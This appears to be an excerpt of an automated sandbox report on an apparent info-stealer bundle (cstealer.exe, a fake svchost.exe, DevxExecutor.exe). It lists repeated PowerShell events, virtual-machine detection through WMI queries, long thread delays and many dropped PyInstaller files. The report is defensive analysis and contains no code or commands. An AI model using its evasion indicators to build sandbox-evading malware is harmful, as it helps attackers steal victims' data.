                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
                                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                Source: C:\ProgramData\main.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\Desktop\DevxExecutor.exeMemory allocated: 36B0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeMemory allocated: 1D1E0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\main.exeMemory allocated: 16133500000 memory reserve | memory write watch
                                Source: C:\ProgramData\main.exeMemory allocated: 1614D010000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80332F6 rdtsc 9_2_00007FF8A80332F6
                                Source: C:\Users\user\Desktop\DevxExecutor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 600000
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599812
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599656
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599433
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599323
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599094
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598930
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598806
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598693
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598544
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598437
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598317
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598187
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598035
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597906
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597716
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597569
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597453
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597310
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597109
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596890
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596680
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596493
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596344
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596203
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596056
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595927
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595778
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595604
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595216
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595061
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 594937
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 10000Jump to behavior
                                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9996Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeWindow / User API: threadDelayed 10000
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeWindow / User API: threadDelayed 9998
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3795
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4346
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3903
                                Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 9553
                                Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 445
                                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9995
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeWindow / User API: threadDelayed 9998
                                Source: C:\ProgramData\main.exeWindow / User API: threadDelayed 2320
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeWindow / User API: threadDelayed 9998
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 941
                                Source: C:\ProgramData\svchost.exeWindow / User API: threadDelayed 9998
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8785
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 412
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeWindow / User API: threadDelayed 9616
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeWindow / User API: threadDelayed 381
                                Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 9999
                                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9997
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeWindow / User API: threadDelayed 9999
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2956
                                Source: C:\ProgramData\svchost.exeWindow / User API: threadDelayed 9991
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeWindow / User API: threadDelayed 8787
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\python311.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_pytransform.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_socket.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\nacl\_sodium.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\rar.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\python311.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\wrapt\_wrappers.cp310-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\bcrypt\_bcrypt.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\python310.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\select.pydJump to dropped file
                                Source: C:\ProgramData\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\python311.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\pyexpat.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_sqlite3.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\select.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_queue.pydJump to dropped file
